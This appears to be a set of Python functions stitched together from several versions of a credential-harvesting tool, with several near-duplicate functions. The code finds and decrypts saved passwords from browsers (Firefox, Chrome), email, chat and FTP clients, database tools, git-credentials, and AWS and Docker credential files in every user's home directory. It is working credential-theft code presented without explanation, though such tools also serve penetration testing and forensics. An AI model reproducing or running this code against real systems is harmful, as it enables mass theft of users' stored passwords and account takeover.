def run(self): """ Main function """ pwd_found = [] profile_list = ( item for sublist in ( self.get_firefox_profiles(path) for path in homes.get(directory=self.path) ) for item in sublist ) for profile in profile_list: self.info(u'Profile path found: {profile}'.format(profile=profile)) for key in self.get_key(profile): credentials = self.get_login_data(profile) for user, password, url in credentials: try: pwd_found.append( { 'URL': url, 'Login': self.decrypt(key=key, iv=user[1], ciphertext=user[2]), 'Password': self.decrypt(key=key, iv=password[1], ciphertext=password[2]), } ) except Exception: self.debug(u'An error occured decrypting the password: {error}'.format( error=traceback.format_exc())) return pwd_found
def run(self, software_name=None): pwdFound = [] try: pwdTab = self.check_if_pidgin_started() if pwdTab != False: pwdFound = pwdTab except: pass for path in homes.get(file=os.path.join('.purple', 'accounts.xml')): tree = ET.ElementTree(file=path) root = tree.getroot() accounts = root.getchildren() for a in accounts: values = {} aa = a.getchildren() for tag in aa: cpt = 0 if tag.tag == 'name': cpt = 1 values['Login'] = tag.text if tag.tag == 'password': values['Password'] = tag.text if len(values) != 0: pwdFound.append(values) return pwdFound
def get_paths(self, software_name): path = '' if software_name == 'Firefox': path = os.path.expanduser(".mozilla/firefox") elif software_name == 'Thunderbird': path = os.path.expanduser(".thunderbird") return homes.get(dir=path)
def run(self): """ Main function """ pwd_found = [] profile_list = ( item for sublist in ( self.get_firefox_profiles(path) for path in homes.get(directory=self.path) ) for item in sublist ) for profile in profile_list: self.info(u'Profile path found: {profile}'.format(profile=profile)) credentials = self.get_login_data(profile) if credentials: for key in self.get_key(profile): for user, password, url in credentials: try: pwd_found.append( { 'URL': url, 'Login': self.decrypt(key=key, iv=user[1], ciphertext=user[2]).decode('utf8'), 'Password': self.decrypt(key=key, iv=password[1], ciphertext=password[2]).decode('utf8'), } ) except Exception: self.debug(u'An error occured decrypting the password: {error}'.format( error=traceback.format_exc())) else: self.info(u'Database empty') return pwd_found
def extract_connections_credentials(self): """ Extract all connection's credentials. :return: List of dict in which one dict contains all information for a connection. """ repos_creds = [] for connection_file_directory in homes.get(directory=u'.ApacheDirectoryStudio'): connection_file_location = os.path.join(connection_file_directory, u'.metadata/.plugins/org.apache.directory.studio.connection.core/connections.xml') if os.path.isfile(connection_file_location): try: connections = parse(connection_file_location).getroot() connection_nodes = connections.findall(".//connection") for connection_node in connection_nodes: creds = {} for connection_attr_name in connection_node.attrib: if connection_attr_name in self.attr_to_extract: creds[connection_attr_name] = connection_node.attrib[connection_attr_name].strip() if creds: repos_creds.append(creds) except Exception as e: self.error(u"Cannot retrieve connections credentials '%s'" % e) return repos_creds
def run(self, software_name=None): all_passwords = [] salt = self.get_salt() for path in homes.get(dir='.sqldeveloper'): mainPath = self.get_mainPath(path) if mainPath == 'SQL_NOT_EXISTS': print_debug('INFO', 'SQL Developer not installed.') continue elif mainPath == 'SQL_NO_PASSWD': print_debug('INFO', 'No passwords found.') continue else: passphrase = self.get_passphrase(mainPath) if passphrase == 'Not_Found': print_debug( 'WARNING', 'The passphrase used to encrypt has not been found.') continue elif passphrase == 'xml_Not_Found': print_debug( 'WARNING', 'The xml file containing the passphrase has not been found.' ) continue else: all_passwords += self.get_infos(mainPath, passphrase, salt) return all_passwords
def run(self, software_name = None): all_passwords = [] salt = self.get_salt() for path in homes.get(dir='.sqldeveloper'): mainPath = self.get_mainPath(path) if mainPath == 'SQL_NOT_EXISTS': print_debug('INFO', 'SQL Developer not installed.') continue elif mainPath == 'SQL_NO_PASSWD': print_debug('INFO', 'No passwords found.') continue else: passphrase = self.get_passphrase(mainPath) if passphrase == 'Not_Found': print_debug('WARNING', 'The passphrase used to encrypt has not been found.') continue elif passphrase == 'xml_Not_Found': print_debug('WARNING', 'The xml file containing the passphrase has not been found.') continue else: all_passwords += self.get_infos(mainPath, passphrase, salt) return all_passwords
def run(self, software_name=None): pwdFound = [] try: pwdTab = self.check_if_pidgin_started() if pwdTab: pwdFound = pwdTab except: pass for path in homes.get(file=os.path.join('.purple', 'accounts.xml')): tree = ET.ElementTree(file=path) root = tree.getroot() for account in root.findall('account'): if account.find('name') is not None: name = account.find('name') password = account.find('password') if name is not None and password is not None: pwdFound.append({ 'Login': name.text, 'Password': password.text }) return pwdFound
def run(self, software_name = None): all_passwords = [] salt = self.get_salt() passphrase = self.get_passphrase() for path in homes.get(dir='.dbvis'): all_passwords += self.get_infos(path, passphrase, salt) return all_passwords
def run(self, software_name=None): all_passwords = [] salt = self.get_salt() passphrase = self.get_passphrase() for path in homes.get(dir='.dbvis'): all_passwords += self.get_infos(path, passphrase, salt) return all_passwords
def get_path(self, software_name): """ Returns path depending on the software wanted (Firefox and Thunderbird share the same code) """ path = '' if software_name == 'Firefox': path = os.path.expanduser(".mozilla/firefox") elif software_name == 'Thunderbird': path = os.path.expanduser(".thunderbird") return homes.get(dir=path)
def get_paths(self): for profile_dir in homes.get(directory=self.path): try: subdirs = os.listdir(profile_dir) except Exception: continue for subdir in subdirs: login_data = os.path.join(profile_dir, subdir, 'Login Data') if os.path.isfile(login_data): yield login_data
def run(self, software_name=None): pwdFound = [] # legend = { # 'sitemanager.xml': 'Stores all saved sites server info including password in plaintext', # 'recentservers.xml': 'Stores all recent server info including password in plaintext', # 'filezilla.xml': 'Stores most recent server info including password in plaintext' # } for xml_file in homes.get(file=[ os.path.join(d, f) for d in ('.filezilla', '.config/filezilla') for f in ('sitemanager.xml', 'recentservers.xml', 'filezilla.xml') ]): print_debug('INFO', '%s' % (xml_file)) tree = ET.ElementTree(file=xml_file) root = tree.getroot() servers = root.getchildren() for ss in servers: server = ss.getchildren() jump_line = 0 for s in server: s1 = s.getchildren() values = {} for s11 in s1: if s11.tag == 'Host': values['Host'] = s11.text if s11.tag == 'Port': values['Port'] = s11.text if s11.tag == 'User': values['Login'] = s11.text if s11.tag == 'Pass': try: # if base64 encoding if 'encoding' in s11.attrib: if s11.attrib['encoding'] == 'base64': values['Password'] = base64.b64decode( s11.text) else: values['Password'] = s11.text except: values['Password'] = s11.text # write credentials into a text file if len(values) != 0: pwdFound.append(values) return pwdFound
def get_paths(self): for profile_dir in homes.get(directory=[u'.config/google-chrome', u'.config/chromium']): try: subdirs = os.listdir(profile_dir) except Exception: continue for subdir in subdirs: login_data = os.path.join(profile_dir, subdir, 'Login Data') if os.path.isfile(login_data): yield login_data
def get_profiles_files(self): for profile_dir in homes.get( directory=[u'.config/psi/profiles', u'.local/psi+/profiles']): try: subdirs = os.listdir(profile_dir) except Exception: continue for subdir in subdirs: login_data = os.path.join(profile_dir, subdir, 'accounts.xml') if os.path.isfile(login_data): yield login_data
def run(self, software_name=None): pwdFound = [] for home in homes.get(dir='.dbvis'): path = os.path.join(home, u'config70', u'dbvis.xml') if os.path.exists(path): tree = ET.ElementTree(file=path) for e in tree.findall('Databases/Database'): values = {} try: values['Name'] = e.find('Alias').text except: pass try: values['Login'] = e.find('Userid').text except: pass try: ciphered_password = e.find('Password').text password = self.decrypt(ciphered_password) values['Password'] = password except: pass try: values['Driver'] = e.find( 'UrlVariables//Driver').text.strip() except: pass try: elem = e.find('UrlVariables') for ee in elem.getchildren(): for ele in ee.getchildren(): if 'Server' == ele.attrib['UrlVariableName']: values['Host'] = str(ele.text) if 'Port' == ele.attrib['UrlVariableName']: values['Port'] = str(ele.text) if 'SID' == ele.attrib['UrlVariableName']: values['SID'] = str(ele.text) except: pass if values: pwdFound.append(values) return pwdFound
def run(self): pwd_found = [] for home in homes.get(directory=u'.dbvis'): path = os.path.join(home, u'config70', u'dbvis.xml') if os.path.exists(path): tree = ElementTree(file=path) elements = { 'Alias': 'Name', 'Userid': 'Login', 'Password': '******', 'UrlVariables//Driver': 'Driver' } for e in tree.findall('Databases/Database'): values = {} for elem in elements: try: if elem != "Password": values[elements[elem]] = e.find(elem).text else: values[elements[elem]] = self.decrypt( e.find(elem).text) except Exception: pass try: elem = e.find('UrlVariables') for ee in elem.getchildren(): for ele in ee.getchildren(): if 'Server' == ele.attrib['UrlVariableName']: values['Host'] = str(ele.text) if 'Port' == ele.attrib['UrlVariableName']: values['Port'] = str(ele.text) if 'SID' == ele.attrib['UrlVariableName']: values['SID'] = str(ele.text) except Exception: pass if values: pwd_found.append(values) return pwd_found
def run(self): pwd_found = [] for home in homes.get(directory=u'.sqldeveloper'): path = os.path.join(home, u'SQL Developer') if os.path.exists(path): self._passphrase = self.get_passphrase(path) if self._passphrase: self.info(u'Passphrase found: {passphrase}'.format(passphrase=self._passphrase)) xml_name = u'connections.xml' xml_file = None if os.path.exists(os.path.join(path, xml_name)): xml_file = os.path.join(path, xml_name) else: for p in os.listdir(path): if p.startswith('system'): new_directory = os.path.join(path, p) for pp in os.listdir(new_directory): if pp.startswith(u'o.jdeveloper.db.connection'): if os.path.exists(os.path.join(new_directory, pp, xml_name)): xml_file = os.path.join(new_directory, pp, xml_name) break if xml_file: wanted_value = ['sid', 'port', 'hostname', 'user', 'password', 'ConnName', 'customUrl', 'SavePassword', 'driver'] renamed_value = {'sid': 'SID', 'port': 'Port', 'hostname': 'Host', 'user': '******', 'password': '******', 'ConnName': 'Name', 'customUrl': 'URL', 'SavePassword': '******', 'driver': 'Driver'} tree = ElementTree(file=xml_file) for e in tree.findall('Reference'): values = {} for ee in e.findall('RefAddresses/StringRefAddr'): if ee.attrib['addrType'] in wanted_value and ee.find('Contents').text is not None: name = renamed_value[ee.attrib['addrType']] value = ee.find('Contents').text if name != 'Password' else self.decrypt( ee.find('Contents').text) values[name] = value pwd_found.append(values) return pwd_found
def run(self): pwd_found = self.get_password_from_dbus() for path in homes.get(file=os.path.join('.purple', 'accounts.xml')): tree = ElementTree(file=path) root = tree.getroot() for account in root.findall('account'): if account.find('name') is not None: name = account.find('name') password = account.find('password') if name is not None and password is not None: pwd_found.append({ 'Login': name.text, 'Password': password.text }) return pwd_found
def run(self): pwd_found = [] for home in homes.get(directory=u'.dbvis'): path = os.path.join(home, u'config70', u'dbvis.xml') if os.path.exists(path): tree = ElementTree(file=path) elements = {'Alias': 'Name', 'Userid': 'Login', 'Password': '******', 'UrlVariables//Driver': 'Driver'} for e in tree.findall('Databases/Database'): values = {} for elem in elements: try: if elem != "Password": values[elements[elem]] = e.find(elem).text else: values[elements[elem]] = self.decrypt(e.find(elem).text) except Exception: pass try: elem = e.find('UrlVariables') for ee in elem.getchildren(): for ele in ee.getchildren(): if 'Server' == ele.attrib['UrlVariableName']: values['Host'] = str(ele.text) if 'Port' == ele.attrib['UrlVariableName']: values['Port'] = str(ele.text) if 'SID' == ele.attrib['UrlVariableName']: values['SID'] = str(ele.text) except Exception: pass if values: pwd_found.append(values) return pwd_found
def run(self): pwd_found = self.get_password_from_dbus() for path in homes.get(file=os.path.join('.purple', 'accounts.xml')): tree = ElementTree(file=path) root = tree.getroot() for account in root.findall('account'): if account.find('name') is not None: name = account.find('name') password = account.find('password') if name is not None and password is not None: pwd_found.append( { 'Login': name.text, 'Password': password.text } ) return pwd_found
def run(self): """ Main function """ known_locations = set() # According to the "git-credential-store" documentation: # Build a list of locations in which git credentials can be stored # Apply the password extraction on the defined locations pwd_found = [] for location in homes.get( directory=[u'.git-credentials', u'.config/git/credentials']): pwd_found += self.extract_credentials(location) known_locations.add(location) # Read Env variable from another user for process in psutil.process_iter(): try: environ = process.environ() except Exception: continue for var in ('XDG_CONFIG_HOME'): if var not in environ or environ[var] in known_locations: continue # Env variable found location = environ[var] known_locations.add(location) pwd_found += self.extract_credentials( os.path.join(location, 'git/credentials')) # Filter duplicates return [{ 'URL': url, 'Login': login, 'Password': password } for url, login, password in set(pwd_found)]
def run(self): pwd_found = [] for xml_file in homes.get(file=[ os.path.join(d, f) for d in ('.filezilla', '.config/filezilla') for f in ('sitemanager.xml', 'recentservers.xml', 'filezilla.xml') ]): if os.path.exists(xml_file): tree = ElementTree(file=xml_file) servers = tree.findall('Servers/Server') if tree.findall( 'Servers/Server') else tree.findall('RecentServers/Server') for server in servers: host = server.find('Host') port = server.find('Port') login = server.find('User') password = server.find('Pass') if host is not None and port is not None and login is not None: values = { 'Host': host.text, 'Port': port.text, 'Login': login.text, } if password is not None: if 'encoding' in password.attrib and password.attrib[ 'encoding'] == 'base64': values['Password'] = base64.b64decode( password.text) else: values['Password'] = password.text pwd_found.append(values) return pwd_found
def run(self): pwd_found = [] for xml_file in homes.get(file=[ os.path.join(d, f) for d in ('.filezilla', '.config/filezilla') for f in ('sitemanager.xml', 'recentservers.xml', 'filezilla.xml') ]): if os.path.exists(xml_file): tree = ElementTree(file=xml_file) servers = tree.findall('Servers/Server') if tree.findall('Servers/Server') else tree.findall( 'RecentServers/Server') for server in servers: host = server.find('Host') port = server.find('Port') login = server.find('User') password = server.find('Pass') if host is not None and port is not None and login is not None: values = { 'Host': host.text, 'Port': port.text, 'Login': login.text, } if password is not None: if 'encoding' in password.attrib and password.attrib['encoding'] == 'base64': values['Password'] = base64.b64decode(password.text) else: values['Password'] = password.text pwd_found.append(values) return pwd_found
def get_paths(self): return homes.get(file=os.path.join('.aws', 'credentials'))
def get_paths(self): return homes.get(file=os.path.join('.docker', 'config.json'))
def get_paths(self): return homes.get( file=os.path.join('.squirrel-sql', 'SQLAliases23.xml'))
def get_paths(self): return homes.get(file=os.path.join('.jitsi', 'sip-communicator.properties'))
def get_paths(self): return homes.get(directory=u'.opera')
def get_paths(self): return homes.get(directory=u'.claws-mail')
def get_paths(self): return homes.get(file=os.path.join('.squirrel-sql', 'SQLAliases23.xml'))
def get_paths(self): return homes.get(dir='.opera')
def run(self): """ Main function """ # Extract all available connections credentials pwd_found = [] for connection_file_directory in homes.get(directory=u'.gftp'): connection_file_location = os.path.join(connection_file_directory, u'bookmarks') if os.path.isfile(connection_file_location): cp = RawConfigParser() cp.read(connection_file_location) for elmt in cp.sections(): username = cp.get(elmt, "username") if username != "anonymous": host = cp.get(elmt, "hostname") port = cp.get(elmt, "port") protocol = cp.get(elmt, "protocol") password = self.decode_password(cp.get(elmt, "password")) account = cp.get(elmt, "account") pwd_found.append({ 'Entry': "Server", 'Host': host, 'Username': username, 'Password': password, 'Port': port, 'Protocol': protocol, 'Account': account, }) # Extract Proxy data from another file connection_file_location = os.path.join(connection_file_directory, u'gftprc') if os.path.isfile(connection_file_location): preferences = open(connection_file_location, 'r').read() # FTP Proxy ftp_proxy_host = self.get_parameter("ftp_proxy_host", preferences) if ftp_proxy_host != "": ftp_proxy_port = self.get_parameter( "ftp_proxy_port", preferences) ftp_proxy_username = self.get_parameter( "ftp_proxy_username", preferences) ftp_proxy_password = self.get_parameter( "ftp_proxy_password", preferences) ftp_proxy_account = self.get_parameter( "ftp_proxy_account", preferences) if ftp_proxy_username != "" and ftp_proxy_password != "": pwd_found.append({ 'Entry': 'FTP Proxy', 'Protocol': 'FTP', 'Host': ftp_proxy_host, 'Port': ftp_proxy_port, 'Username': ftp_proxy_username, 'Password': ftp_proxy_password, 'Account': ftp_proxy_account }) # HTTP Proxy http_proxy_host = self.get_parameter("http_proxy_host", preferences) if http_proxy_host != "": http_proxy_port = self.get_parameter( "http_proxy_port", preferences) http_proxy_username = self.get_parameter( "http_proxy_username", preferences) http_proxy_password = self.get_parameter( "http_proxy_password", preferences) http_proxy_account = self.get_parameter( "http_proxy_account", preferences) if http_proxy_username != "" and http_proxy_password != "": pwd_found.append({ 'Entry': "HTTP Proxy", 'Protocol': "HTTP", 'Host': http_proxy_host, 'Port': http_proxy_port, 'Username': http_proxy_username, 'Password': http_proxy_password, 'Account': http_proxy_account }) return pwd_found
def get_paths(self): return homes.get(file=u'.claws-mail/accountrc')
def run(self): """ Main function """ pwd_found = [] #KeepassX for connection_file_directory in homes.get(directory=u'.config/keepassx'): #Used to replace ./ by the home path home = connection_file_directory.partition('./config')[0] connection_file_location = os.path.join(connection_file_directory, u'config.ini') if os.path.isfile(connection_file_location): cp = RawConfigParser() cp.read(connection_file_location) try: database = cp.get("Options", "LastFile").replace('./', home) keyfile = cp.get("Options", "LastKeyLocation").replace('./', home) keytype = cp.get("Options", "LastKeyType") if keytype == "Password": keyfile = "No keyfile needed" elif keyfile == "": keyfile = "No keyfile found" pwd_found.append({ 'Keyfile': keyfile, 'Database': database }) except: pass #Keepass2 for connection_file_directory in homes.get(directory=u'.config/KeePass'): home = connection_file_directory.partition('./config')[0] connection_file_location = os.path.join(connection_file_directory, u'KeePass.config.xml') if os.path.isfile(connection_file_location): try: connections = parse(connection_file_location).getroot() connection_nodes = connections.findall(".//Association") for connection_node in connection_nodes: database = connection_node.find('DatabasePath').text.replace("../../../", home) keyfile = connection_node.find('KeyFilePath').text.replace("../../../", home) pwd_found.append({ 'Keyfile': keyfile, 'Database': database }) except: pass try: connections = parse(connection_file_location).getroot() connection_nodes = connections.findall(".//LastUsedFile") for connection_node in connection_nodes: database = connection_node.find('Path').text.replace("../../../", home) already_in_pwd_found = 0 for elmt in pwd_found: if database == elmt['Database']: already_in_pwd_found = 1 if already_in_pwd_found == 0: pwd_found.append({ 'Keyfile': "No keyfile found", 'Database': database }) except: pass try: connections = parse(connection_file_location).getroot() connection_nodes = connections.findall(".//ConnectionInfo") for connection_node in connection_nodes: database = connection_node.find('Path').text.replace("../../../", home) already_in_pwd_found = 0 for elmt in pwd_found: if database == elmt['Database']: already_in_pwd_found = 1 if already_in_pwd_found == 0: pwd_found.append({ 'Keyfile': "No keyfile found", 'Database': database }) except: pass return pwd_found